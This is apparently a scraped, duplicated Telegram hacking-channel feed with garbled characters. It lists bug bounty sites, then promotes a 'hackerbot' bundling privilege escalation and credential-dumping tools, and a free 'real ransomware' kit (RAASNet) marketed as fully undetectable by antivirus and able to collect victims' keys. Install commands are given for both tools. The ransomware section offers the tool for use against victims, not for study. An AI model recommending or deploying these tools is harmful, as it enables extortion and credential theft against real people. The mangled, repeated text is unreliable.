β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BUG BOUNTY :
- Bugbountyjp
- Bugcrowd
- CESPPA
- Cobalt
- Coder Bounty
- Detectify
- FOSS Factory
- FreedomSponsors
- HackenProof
- Hackerhive
- HackerOne
- Hacktrophy
- intigriti
- Safehats
- Synack
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BUG BOUNTY :
- Bugbountyjp
- Bugcrowd
- CESPPA
- Cobalt
- Coder Bounty
- Detectify
- FOSS Factory
- FreedomSponsors
- HackenProof
- Hackerhive
- HackerOne
- Hacktrophy
- intigriti
- Safehats
- Synack
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This bot is a combination of chatbot and hacking tools
Chatting
Twitter account analysis
Url scan
File scan
Ip scan
Linux enumeration
Linux priv escalation checker
Shellshock
Mimipenguin
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/omergunal/hackerbot
2) cd hackerbot
3) chmod +x install.sh
4) ./install.sh
5) python hackerbot.py
arguments in chat:
!help show what you can do
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This bot is a combination of chatbot and hacking tools
Chatting
Twitter account analysis
Url scan
File scan
Ip scan
Linux enumeration
Linux priv escalation checker
Shellshock
Mimipenguin
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/omergunal/hackerbot
2) cd hackerbot
3) chmod +x install.sh
4) ./install.sh
5) python hackerbot.py
arguments in chat:
!help show what you can do
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - omergunal/hackerbot: Chat with hacker assistant
Chat with hacker assistant. Contribute to omergunal/hackerbot development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED ANOTHER FREE REAL RANSOMWARE:
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
Testing connection with remote server:
5) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
6) python3 test_socket.py
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED ANOTHER FREE REAL RANSOMWARE:
Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/leonv024/RAASNet.git
2) pip3 install -r requirements.txt
3) python3 RAASNet.py
On Linux, you might need to install these packages:
4) sudo apt install python3-tk python3-pil python3-pil.imagetk
Testing connection with remote server:
5) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
6) python3 test_socket.py
β β β Uππ»βΊπ«Δπ¬πβ β β β